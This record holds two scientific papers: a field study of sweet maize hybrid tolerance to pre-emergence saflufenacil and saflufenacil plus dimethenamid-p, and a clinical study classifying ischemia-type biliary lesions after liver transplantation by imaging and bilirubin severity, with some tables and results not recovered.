Saflufenacil is also compatible with residual herbicides that control grasses. BASF has developed a saflufenacil plus dimethenamid-p premix (BAS781) for use in maize and other crops [6]. Dimethenamid-p is a chloroacetamide herbicide that inhibits very-long-chain fatty acid synthesis in susceptible plants [7]. Dimethenamid-p can provide season-long control of a broad spectrum of grass and broadleaved weeds such as barnyardgrass (Echinochloa crusgalli), autumn panicum (Panicum dichotomiflorum), giant foxtail (Setaria faberi), green foxtail (Setaria viridis), yellow foxtail (Setaria glauca), large crabgrass (Digitaria sanguinalis), smooth crabgrass (Digitaria ischaemum), witchgrass (Panicum capillare), redroot pigweed (Amaranthus retroflexus), American black nightshade (Solanum americanum), and eastern black nightshade (Solanum ptycanthum) [2,7]. Dimethenamid-p at the registered application doses has been shown to cause little or no injury in field maize [8,9]. Saflufenacil plus dimethenamid-p can provide an effective broad-spectrum herbicide option for the control of troublesome species in sweet maize.
Saflufenacil and saflufenacil plus dimethenamid-p are desirable complements to current weed management programs in sweet maize because of their low dosage, broad-spectrum weed control, environmental safety, and new mode of action, which will help reduce selection for herbicide-resistant biotypes. There is no published information on the sensitivity of sweet maize hybrids to PRE application of saflufenacil or saflufenacil plus dimethenamid-p. If tolerance is adequate, registration of saflufenacil and saflufenacil plus dimethenamid-p will provide sweet maize growers with an additional option for annual weed control. Sensitivity of sweet maize to herbicides depends on the application dose, hybrid, and environmental conditions. Sweet maize hybrid sensitivity has been documented for foramsulfuron [10], bentazon [11], prosulfuron [12], mesotrione [13], nicosulfuron [14,15], primisulfuron [16], isoxaflutole [17], and thifensulfuron-methyl [18].
The objective of this study was to determine the sensitivity of Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 sweet maize to saflufenacil and saflufenacil plus dimethenamid-p applied PRE under Ontario environmental conditions.
Materials and Methods
Field experiments were conducted at the University of Guelph, Ridgetown Campus, Ridgetown, Ontario and the Huron Research Station, Exeter, Ontario in 2008 and 2009. The soil at the Ridgetown location was a Watford/Brady loam composed of 51% sand, 32% silt, 16% clay, and 5.5% organic matter with a pH of 7.2 in 2008 and 49% sand, 34% silt, 17% clay, and 9.2% organic matter with a pH of 7.2 in 2009. The soil at the Exeter location was a Brookston clay loam composed of 34% sand, 36% silt, 30% clay, and 3.6% organic matter with a pH of 8.0 in 2008 and 39% sand, 37% silt, 24% clay, and 4.3% organic matter with a pH of 7.9 in 2009. Seedbed preparation consisted of moldboard plowing in the fall and cultivation in the spring. Fertilizer was broadcast and incorporated prior to seeding based on soil tests and local recommendations.
There were two experiments established side by side at each site (one evaluating saflufenacil and the other evaluating saflufenacil plus dimethenamid-p). The experiments were arranged in a split-plot design with four replications. The main plots were herbicide dose, and the subplots were sweet maize hybrids. Selection of herbicide doses was based on the manufacturer's recommended use dose and twice the manufacturer's recommended dose.
Treatments consisted of a non-treated check and two doses of saflufenacil (0, 75, and 150 g a.i. ha⁻¹) or saflufenacil plus dimethenamid-p (0, 735, and 1470 g a.i. ha⁻¹), representing the untreated control and 1X and 2X the proposed label dose, respectively. Eight of the most commonly grown processing sweet maize hybrids in southwestern Ontario, encompassing a range of endosperm genotypes, were selected: Cahill (su), GH4927 (su), Harvest Gold (su), Rocker (su), BSS5362 (sh2), GG236 (su), GG447 (su), and GG763 (su). Each of the main plots was 6 m wide by 8 m long at Ridgetown and 6 m wide by 10 m long at Exeter. The subplots each consisted of a single row of each sweet maize hybrid with rows spaced 75 cm apart. The sweet maize was thinned to 50,000 plants ha⁻¹ shortly after emergence. The plots were then kept weed-free using inter-row cultivation and hand hoeing as required.
Herbicide treatments were applied PRE four to eight days after planting using a CO₂-pressurized backpack sprayer calibrated to deliver 200 L ha⁻¹ of aqueous solution at 241 kPa. The boom was 1.5 m wide with four ULD120-02 nozzle tips (Spraying Systems Co., Wheaton, IL) spaced 0.5 m apart.
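As a worked example of the calibration arithmetic behind such a sprayer setup, the sketch below uses the standard relation: flow per nozzle (L/min) = application rate (L/ha) × speed (km/h) × nozzle spacing (m) / 600. The application rate and nozzle spacing come from the text; the walking speed is an assumption for illustration, as it is not stated in the paper.

```python
# Sketch of backpack-sprayer calibration arithmetic.
# Standard relation: L/min per nozzle = (L/ha) * (km/h) * spacing_m / 600.
# Rate and nozzle spacing are from the text; the walking speed is an
# assumption for illustration only.

def nozzle_flow_l_per_min(rate_l_per_ha: float, speed_km_h: float,
                          spacing_m: float) -> float:
    return rate_l_per_ha * speed_km_h * spacing_m / 600.0

rate = 200.0    # L/ha, from the text
spacing = 0.5   # m between nozzles, from the text
speed = 4.8     # km/h walking speed -- assumed, not stated in the paper

flow = nozzle_flow_l_per_min(rate, speed, spacing)
print(f"Required output per nozzle: {flow:.2f} L/min")  # 0.80 L/min
```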
Crop injury, including stand reduction, was evaluated visually by comparing the non-treated hybrid to the respective treated hybrids on a scale of 0 to 100% at 1 and 2 weeks after emergence (WAE). A rating of 0% was defined as no visible effect of the herbicide, and 100% was defined as plant death. Average maize height (based on ten random plants per subplot) was measured for each subplot 3 WAE. Plant height was defined as the maximum height from the soil surface with the leaves fully extended. At maturity, each subplot was harvested by hand, and cob size, marketable yield (a cob greater than 5 cm in diameter), and total yield were recorded. Because the results of the statistical analyses for total and marketable yields were similar, only marketable yield is reported.
All data were subjected to analysis of variance (ANOVA). Tests were combined over locations and years and analyzed using the PROC MIXED procedure of SAS (Statistical Analysis Systems Institute, Cary, NC, USA). Variances of percent crop injury at 1 and 2 WAE, plant height, cob size, and yield were partitioned into the fixed effects of herbicide treatment, hybrid, and the herbicide-by-hybrid interaction, and into the random effects of site-year, block (site-year), site-year by treatment, site-year by hybrid, and site-year by hybrid by treatment. Significance of random effects was tested using a Z-test of the variance estimate, and fixed effects were tested using F-tests. Error assumptions of the variance analyses (random, homogeneous, normally distributed errors) were confirmed using residual plots and the Shapiro-Wilk normality test. To meet the assumptions of the variance analysis, visual injury at 1 and 2 WAE was subjected to an arcsine square-root transformation, and cob size data were log-transformed. No transformation was required for plant height or yield. Treatment means were separated using Fisher's protected LSD test. Means of percent injury and cob size were compared on the transformed scale and converted back to the original scale for presentation of results. Type I error was set at P ≤ 0.05 for all statistical comparisons.
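To illustrate the transformation step described above, the snippet below applies the arcsine square-root transformation used for the percent-injury data and back-transforms the resulting mean for presentation, mirroring the paper's reporting of means on the original scale. The sample values are made up for illustration; this is not the study's data, nor the full PROC MIXED model.

```python
import numpy as np

# Arcsine square-root transformation for percentage data (0-100%),
# as used for the injury ratings; these values are illustrative only.
injury_pct = np.array([0.0, 2.0, 3.0, 5.0, 1.0])  # made-up ratings (%)

transformed = np.arcsin(np.sqrt(injury_pct / 100.0))  # analyze on this scale
mean_t = transformed.mean()

# Back-transform the mean to the original % scale for presentation,
# as the authors did for means of percent injury and cob size.
back_pct = (np.sin(mean_t) ** 2) * 100.0
print(f"Back-transformed mean injury: {back_pct:.2f}%")
```

The transformation stabilizes the variance of proportion-type data near the 0% boundary, which is why it is applied before ANOVA on low injury ratings like these.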
Results and Discussion
Statistical analysis of the data on visible injury, plant height, cob size, and yield showed that the random effects of location, year, year by location, and their interactions with treatments were not significant. Therefore, data were pooled and averaged over years and locations (Tables 1-4).
Crop Injury
The only visible injury symptom observed was leaf speckling.
These results are similar to those reported in field maize. Soltani et al. (2009) [19] found 1% or less injury in maize with saflufenacil applied PRE at 50, 100, and 200 g a.i. ha⁻¹. Moran (2010) [20] also found no injury in field maize with saflufenacil applied PRE at 75 and 150 g a.i. ha⁻¹ or saflufenacil plus dimethenamid-p applied PRE at 735 and 1470 g a.i. ha⁻¹. The minimal visible injury seen in the different sweet maize hybrids evaluated in this study is also consistent with previous studies on clopyralid [21].
Plant Height
No reduction in plant height was observed for any of the eight sweet maize hybrids treated with saflufenacil or saflufenacil plus dimethenamid-p applied PRE at the doses evaluated (Table 2). Plant height was similarly unaffected by increasing herbicide doses. In other studies, Soltani et al. (2009) [19] reported no adverse effect on field maize height with saflufenacil applied PRE at doses up to 200 g a.i. ha⁻¹. The lack of any height reduction among the sweet maize hybrids evaluated in this study with saflufenacil and saflufenacil plus dimethenamid-p is similar to results found with other herbicides such as clopyralid, halosulfuron, and topramezone [21,26].
Cob Size
Saflufenacil and saflufenacil plus dimethenamid-p applied PRE at the doses evaluated caused no decrease in cob size of Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 sweet maize (Table 3). Results in these trials are similar to findings with other herbicides such as halosulfuron, which did not cause any negative impact on cob size at 1X or 2X the proposed label dose for any of the sweet maize hybrids studied [26]. However, other studies have shown that cob size of susceptible hybrids can be reduced by up to 67% with clopyralid or thifensulfuron-methyl [18,21].
Yield
Saflufenacil and saflufenacil plus dimethenamid-p applied PRE at the doses evaluated caused no adverse effect on yield of Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 sweet maize (Table 4). Yield was similarly unaffected by increasing herbicide doses in all sweet maize hybrids evaluated. In other studies, Soltani et al. (2009) [19] reported no adverse effect on yield with saflufenacil applied PRE in field maize at doses up to 200 g a.i. ha⁻¹. Moran (2010) [20] also found no yield reduction in field maize with saflufenacil applied PRE at 75 and 150 g a.i. ha⁻¹ or saflufenacil plus dimethenamid-p applied PRE at 735 and 1470 g a.i. ha⁻¹. The yield responses to saflufenacil and saflufenacil plus dimethenamid-p are similar to responses to other herbicides, such as clopyralid [21], topramezone [22], and halosulfuron [26], for which yield was not adversely affected when the herbicide was applied at the label dose. However, other studies have reported significant injury in some sweet maize hybrids with certain herbicides. Diebold et al. (2003, 2004) [10] reported up to 94% reduction in yield with foramsulfuron in sweet maize. Similar yield reductions were reported with mesotrione [13], nicosulfuron [14], foramsulfuron [10], and nicosulfuron plus rimsulfuron [24,25] in some sensitive sweet maize hybrids. The potential for and level of crop injury from use of nicosulfuron, mesotrione, and foramsulfuron on any specific sweet maize hybrid is conditioned largely by CYP alleles at the nsf1/ben1 locus on the short arm of chromosome 5 [27]. However, the sensitivity of sweet maize to other herbicides is controlled by other gene loci. Bentazon metabolism, for example, is controlled by ben1, as well as two independent genes, Cr1 and Cr2 [28]. It is hypothesized that sweet maize tolerance to saflufenacil is also conditioned by alternate alleles of the above genes and/or different gene loci, which have, as yet, not been determined.
Conclusion
Based on this study, the sweet maize hybrids Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 are tolerant to saflufenacil and saflufenacil plus dimethenamid-p applied PRE at the doses evaluated. Saflufenacil and saflufenacil plus dimethenamid-p applied PRE to the eight sweet maize hybrids caused no injury and had no negative effect on height, cob size, or yield. As the dose of saflufenacil or saflufenacil plus dimethenamid-p was increased from 1X to 2X the proposed label dose, there was no negative effect on any sweet maize hybrid. This study shows that saflufenacil and saflufenacil plus dimethenamid-p can be safely applied to these eight sweet maize hybrids at the proposed label dose. The registration of saflufenacil alone or pre-mixed with dimethenamid-p would provide Ontario sweet maize producers with a new, broad-spectrum herbicide that controls selected annual grass and broadleaved weed species. Furthermore, if used in a diversified, integrated weed management program, it would reduce the selection intensity for herbicide-resistant weeds.
Table 1. Injury at 1 and 2 weeks after emergence (WAE) of eight sweet maize hybrids treated prior to emergence with saflufenacil at 0, 75, and 150 g·ha⁻¹ or saflufenacil plus dimethenamid-p at 0, 735, and 1470 g·ha⁻¹ at Exeter, ON, and Ridgetown, ON, in 2008 and 2009. Column headings: Treatment/Hybrid; Injury 1 WAE (%) at 75/735 and 150/1470 g·ha⁻¹; Injury 2 WAE (%) at 75/735 and 150/1470 g·ha⁻¹ (table body not recovered).
a Abbreviations: su = sugary; sh 2 = shrunken endosperm mutant genotype; b Results are averaged for both locations and years; means followed by the same letter within a row for each treatment are not significantly different according to Fisher's Protected LSD test (P ≤ 0.05). | 2018-12-13T08:21:04.693Z | 2012-01-01T00:00:00.000 | {
"year": 2012,
"sha1": "539ddf1e03e54609686afe17d2ac3cd0ec4a90cd",
"oa_license": "CCBY",
"oa_url": "http://www.scirp.org/journal/PaperDownload.aspx?paperID=16642",
"oa_status": "GOLD",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "539ddf1e03e54609686afe17d2ac3cd0ec4a90cd",
"s2fieldsofstudy": [
"Agricultural and Food Sciences"
],
"extfieldsofstudy": [
"Biology"
]
} |
4038253 | pes2o/s2orc | v3-fos-license | Clinical Analysis of Classification and Prognosis of Ischemia-Type Biliary Lesions After Liver Transplantation
Background The aim of this study was to classify ischemia-type biliary lesions after liver transplantation according to their imaging findings and the severity of clinical manifestations, and to analyze the relationship between such classification and prognosis. Material/Methods We collected clinical data of patients with ischemia-type biliary lesions (ITBL) after liver transplantation in the Organ Transplantation Center, the First Central Hospital of Tianjin, from August 2012 to July 2013; all patients were classified according to their imaging findings and relevant clinical data to analyze the relationship between their classification and prognosis. Results The mean postoperative survival time, as well as the 1-, 3-, and 5-year survival rates, in Group ITBL differed significantly from those in Group NITBL (log rank=12.13, P<0.001), but the mean postoperative survival times among the mild, moderate, and severe ITBL cases did not differ significantly. The incidence rates of 1-, 3-, and 5-year adverse prognosis in Group ITBL differed significantly from those in Group NITBL, in which <2% of patients had anastomotic biliary obstruction (log rank=277.06, P<0.001); among the ITBL cases, the difference in the incidence rate of adverse prognosis between severe and moderate ITBL was not statistically significant, whereas the differences between mild and moderate ITBL (log rank=6.01, P=0.014) and between mild and severe ITBL (log rank=10.98, P=0.001) were statistically significant. Conclusions ITBL classification based on the severity of biliary imaging and bilirubin level can predict the prognosis of ITBL.
Background
Organs that have been successfully transplanted many times include the kidneys, liver, heart, lungs, pancreas, intestine, and thymus [1]. Liver transplantation is considered the most effective way to treat end-stage liver diseases, including hepatic carcinoma [2], cirrhosis caused by harmful alcohol consumption, viral hepatitis B and C, and metabolic syndromes related to overweight and obesity [3]. In the last 4 decades, liver transplantation has developed from an experimental approach with very high mortality into an almost routine procedure with good short- and long-term survival rates [4]. However, some complications still threaten graft survival and affect patient quality of life [5]. Despite significant advances in orthotopic liver transplantation (OLT), biliary tract reconstruction is still a major source of complications [6], and ischemia-type biliary lesions (ITBL) are a severe, graft-threatening complication after liver transplantation [7], associated with worse graft survival and poor prognosis [8]. This complication develops in up to 25% of patients, with a 50% re-transplantation rate in affected patients [9], and there are 3 main outcomes. The first is full remission through biliary support treatment, after which the biliary support tube can be removed and liver function returns to normal. The second requires continued biliary support treatment to maintain near-normal liver function, but the support tube cannot be removed, resulting in long-term tube-dependent survival. In the third, treatment is ineffective, which may cause recurrent cholangitis and eventually lead to liver failure [10]. Graft dysfunction normally leads to re-transplantation or death, so treatment protocols should be developed as soon as possible to improve the patient survival rate. This study analyzed and classified the features of ITBL with the goal of properly estimating the prognosis of ITBL, determining the treatment program, and improving the patient survival rate [11].
Subjects
The clinical data of patients with ITBL after liver transplantation in the Organ Transplantation Center, the First Central Hospital of Tianjin, from August 2012 to July 2013 were collected and assessed, together with biliary imaging results such as T-tube cholangiography, endoscopic retrograde cholangiography (ERC), percutaneous trans-hepatic cholangiography (PTC), and magnetic resonance cholangiopancreatography (MRCP). This study was conducted in accordance with the Declaration of Helsinki and with approval from the Ethics Committee of the First Central Hospital of Tianjin. Written informed consent was obtained from all participants.
Criteria of imaging classification
Using data from 124 ITBL patients diagnosed by clinical and imaging results, we performed the imaging severity classification, treatment strategy analysis, and prognostic assessment. Among the 124 ITBL patients, 98.3% had hilar bile duct stenosis and 93.2% had intrahepatic bile duct stenosis. According to the biliary imaging morphology and the total bilirubin level, these ITBL patients were divided into 3 categories: mild, moderate, and severe. Imaging scores and clinical criteria for ITBL after liver transplantation are shown in Table 1, and the criteria of mild, moderate, and severe ITBL are shown in Table 2.
Observation indexes
The mean postoperative survival time and the 1-, 3-, and 5-year incidence rates of adverse prognosis were recorded during follow-up. Risk factors, including anhepatic time, intraoperative use of erythrocytes and plasma, cold ischemic time of the donor liver, and donor weight, were compared among the mild, moderate, and severe ITBL patients.

Table 1 (excerpt). 2 points: severe lesions in up to half of the hepatic ducts, with more than half of the hepatic ducts intact; total bilirubin abnormal, elevated more than 2-fold but not exceeding 100 µmol/L. 3 points: stenosis of all hepatic ducts, involving the secondary bile ducts; intrahepatic biliary lesions involving the whole liver, with less than half of the hepatic ducts intact; total bilirubin abnormal and >100 µmol/L.
Statistical analysis
SPSS 22.0 statistical software was used for the analysis. Measurement data are expressed as mean ± standard deviation (x̄ ± s). Comparison of average values at the same time point among different groups was analyzed by one-way ANOVA. The LSD test was used for multiple comparisons, and the t test was used for intergroup comparisons. The Kaplan-Meier method was used to analyze survival time among patients with different classifications, with P<0.05 considered statistically significant.
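As a sketch of the Kaplan-Meier and log-rank comparison described here, the snippet below uses the lifelines package. The durations and event indicators are fabricated placeholders; the study's actual patient-level data are not reproduced, and the group sizes are arbitrary.

```python
# Sketch of the Kaplan-Meier / log-rank comparison between groups,
# using the `lifelines` package. All data below are fabricated
# placeholders, not the study's patient-level records.
import numpy as np
from lifelines import KaplanMeierFitter
from lifelines.statistics import logrank_test

rng = np.random.default_rng(0)
# Months of follow-up and death/graft-loss indicators (1 = event).
itbl_t, itbl_e = rng.exponential(40, 50), rng.integers(0, 2, 50)
nitbl_t, nitbl_e = rng.exponential(60, 50), rng.integers(0, 2, 50)

kmf = KaplanMeierFitter()
kmf.fit(itbl_t, event_observed=itbl_e, label="ITBL")
print(kmf.survival_function_.tail(1))  # estimated S(t) at the longest time

result = logrank_test(itbl_t, nitbl_t,
                      event_observed_A=itbl_e, event_observed_B=nitbl_e)
print(f"log-rank statistic = {result.test_statistic:.2f}, "
      f"p = {result.p_value:.4f}")
```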
Classification of ITBL
According to the classification criteria in Table 2, the 124 ITBL patients were classified as mild ITBL (28 cases, 22.6%), moderate ITBL (59 cases, 47.6%), or severe ITBL (37 cases, 29.8%). Imaging examples of the different levels of ITBL are shown in Figure 1.
Table 2. Criteria of mild, moderate, and severe ITBL (classification / points / conditions).
Mild ITBL, 1-3 points: the hilar injury and intrahepatic conditions did not exceed mild injury, and there was no obvious jaundice.
Moderate ITBL, 4-6 points: at least one of the hilar and intrahepatic items reached moderate injury, but none reached severe injury, and the bilirubin level was slightly elevated.
Severe ITBL, 7-9 points: at least one of the hilar and intrahepatic items reached severe injury, and the bilirubin level was severely increased.

Figure 1 (partial caption). [...] The right hepatic duct opening shows stenosis, but the right hepatic bile duct is still intact; total bilirubin <30 µmol/L (2+2+1=5 points). (E) Severe ITBL: the main hepatic ducts show stenosis, so long-term catheter support is required for drainage; part of the biliary tree in the right anterior liver lobe is normal. The patient survives with the tube in place; cholangitis is intermittent, and liver function is abnormal; total bilirubin <60 µmol/L (3+2+2=7 points). (F) Severe ITBL: the main hepatic ducts show stenosis, so long-term catheter support is required for drainage; a partial biliary tree can be seen in the liver. The patient survives with the tube in place; cholangitis is intermittent, and liver function is abnormal; total bilirubin <80 µmol/L (3+3+2=8 points). (G) Severe ITBL: the biliary tree along the entire main hepatic trunk has become thin and stenotic, and some terminal branches are stiff. The patient has been transplanted twice; total bilirubin <100 µmol/L (3+3+3=9 points). (H) Severe ITBL: the intrahepatic biliary tree has disappeared, and the hilar biliary tract shows cystic dilatation; the patient is awaiting re-transplantation; total bilirubin >100 µmol/L (3+3+3=9 points).
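To make the scoring scheme explicit, the sketch below maps the three sub-scores (hilar injury, intrahepatic injury, and bilirubin level, each 1-3 points) to the mild/moderate/severe categories by total points, following the ranges in Table 2 (1-3, 4-6, 7-9). The function and example values are our own illustration, not code from the study.

```python
# Sketch of the ITBL severity classification from Table 2: three
# sub-scores (hilar injury, intrahepatic injury, bilirubin), each
# 1-3 points, summed to a 3-9 point total. The point ranges follow
# the paper; the function itself is our illustration.

def classify_itbl(hilar: int, intrahepatic: int, bilirubin: int) -> str:
    for score in (hilar, intrahepatic, bilirubin):
        if score not in (1, 2, 3):
            raise ValueError("each sub-score must be 1, 2, or 3")
    total = hilar + intrahepatic + bilirubin
    if total <= 3:
        return "mild"      # 1-3 points in Table 2
    if total <= 6:
        return "moderate"  # 4-6 points
    return "severe"        # 7-9 points

# Examples mirroring the Figure 1 captions: (2+2+1=5) -> moderate,
# (3+2+2=7) -> severe, (3+3+3=9) -> severe.
print(classify_itbl(2, 2, 1))  # moderate
print(classify_itbl(3, 2, 2))  # severe
print(classify_itbl(3, 3, 3))  # severe
```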
Relationship between ITBL classification and different risk factors
The anhepatic time, intraoperative use of erythrocytes and plasma, cold ischemic time of donor, and donor weight were compared among the mild, moderate, and severe ITBL patients, and the differences showed no statistical significance (P=0.528, 0.37, 0.156, 0.409) ( Table 3).
Relationship between ITBL classification and postoperative survival
At the end of the follow-up, all 886 OLT recipients we investigated were divided into Group ITBL and Group NITBL, and their survival was analyzed using the Kaplan-Meier method.
Discussion
ITBL after liver transplantation is unexplained and is characterized by intrahepatic and hilar biliary stricture and disappearance, which is an important part of biliary complications after liver transplantation. The criterion standard of diagnosing ITBL is trans-T tube PTC or trans-ERC cholangiography, which can show details of different lesions, such as biliary thinning, stenosis, expansion, or disappearance, in the non-anastomotic part of the donor liver [12]. It may be accompanied by liver function abnormalities, including increased levels of bilirubin, alkaline phosphatase, and glutamyl transpeptidase [13,14].
Previous studies have failed to provide definite conclusions regarding the classification of ITBL. Some studies divided it into extrahepatic type, intrahepatic type, and mixed type [15,16]. This classification based only on locations seems simple, but it cannot reflect the severity of ITBL. Most ITBL patients have both extra-and intrahepatic lesions, and only a small number of mild patients do not have intrahepatic lesions. However, regardless of intrahepatic lesions or extrahepatic lesions, they both have significant differences in the degree of severity. ITBL should be categorized from the perspective of prognosis, and the goal is to predict the 3 very different prognoses of ITBL: recovery, long-term survival, and graft dysfunction (i.e., liver failure).
There are differences between hilar biliary stricture and intrahepatic biliary stricture. First, ITBL appears much more commonly in the porta hepatis than inside the liver. Second, the anatomical blood supply of these 2 parts differs significantly. In the classic anatomy of the extrahepatic biliary tract, the left and right hepatic ducts drain the left and right liver lobes and fuse into the common hepatic duct. The intrahepatic bile duct can be further subdivided into the greater and smaller bile ducts [17,18]. The epithelium of grade 4-5 biliary ducts is lined with the basement membrane, together with tight junctions among the cells and microvilli extending into the bile duct [19]. The vascular plexus of the hilar biliary system is supplied directly through the arteries, consisting of the right and left hepatic arteries and indirect branches originating from the gastroduodenal artery [20,21]. The surface veins on the bile duct closely attach to the arterial plexus and drain into other veins. The blood in the peripheral vascular plexus of the smaller bile duct connects to the sinusoid, which then connects to the portal vein system through both the lobular branches and the peri-biliary branches. Through the very small capillaries in the portal area, oxygen and nutrients can finally be transported to the sinusoid through the distal arterial branches of the hepatic artery [22]. In severe ITBL patients, all the hilar biliary ducts may collapse [11,23]. If there is simple hilar stenosis without intrahepatic injury, which is equivalent to a hilar biliary obstructive disease, biliary stent treatment can be performed for control. The degree of destruction of the hilar biliary tract determines whether the stent can be removed from ITBL patients, and the degree of intrahepatic biliary injury determines whether ITBL patients will develop graft dysfunction. The intrahepatic biliary blood supply can be recovered relatively easily through the intrahepatic lobular tissue and portal blood supply. However, the destruction of the intrahepatic biliary duct caused by cholangitis is fatal. Patients with liver transplantation need life-long immunosuppressive agents, so once the support tube is blocked in such ITBL patients, cholangitis develops very easily. Repeated biliary tract infections then further injure the biliary duct (repair and then re-stenosis), forming a vicious cycle of stenosis, obstruction, infection, scar repair, and aggravated stenosis [23]. Therefore, the treatment of patients with moderate ITBL (i.e., with severe hilar stenosis but sufficient liver function to ensure hepatic metabolism) should aim to break this vicious cycle; infection is the most easily controlled clinical aspect, so preventing infection is as crucial as anti-infective treatment [24,25].
The significance of this classification for treatment lies in identifying the group of patients with moderate ITBL, and we hope clinicians will pay more attention to this group. The prognosis of such patients ranges from infection-induced death to a good quality of life. Many believe that once ITBL occurs, no treatment should be attempted, so study, treatment, and care of this group of patients are neglected. It is often thought that treatment of such patients is meaningless and that a necessary liver transplantation would be irresponsible. In fact, it is precisely this type of patient who needs the most careful treatment, immunosuppressive agent adjustment, infection control, and biliary drainage observation. Improving biliary interventional treatment techniques, developing new biliary support equipment, and extending graft survival can even cure them.
In this study, the classification of ITBL is based on our retrospective analysis. The sample is relatively limited, and the criteria for the different groups will still need long-term evolution and adjustment. However, classifying ITBL is of great necessity and requires more clinician attention so as to refine diagnosis, standardize treatment, and improve prognosis. ITBL is not a surgical complication, and due to its high morbidity and poor prognosis, it is known as the "Achilles heel" of liver transplantation; furthermore, its pathogenesis is still unclear. ITBL should be studied as a separate disease, and transplantation surgeons should focus more attention on the study and treatment of ITBL rather than feeling discouraged and ignoring it.
Conclusions
Our analysis of the features of ITBL classification suggests that a classification based on the severity of biliary imaging and the bilirubin level can predict the prognosis of ITBL and can further contribute to determining the treatment program and improving the survival of ITBL patients.
Conflicts of interest
None. | 2018-04-03T03:35:58.359Z | 2018-03-20T00:00:00.000 | {
"year": 2018,
"sha1": "cee65933e46ba03534195a61203a5eb5975504ae",
"oa_license": "CCBYNCND",
"oa_url": "https://europepmc.org/articles/pmc6248068?pdf=render",
"oa_status": "GREEN",
"pdf_src": "PubMedCentral",
"pdf_hash": "cee65933e46ba03534195a61203a5eb5975504ae",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |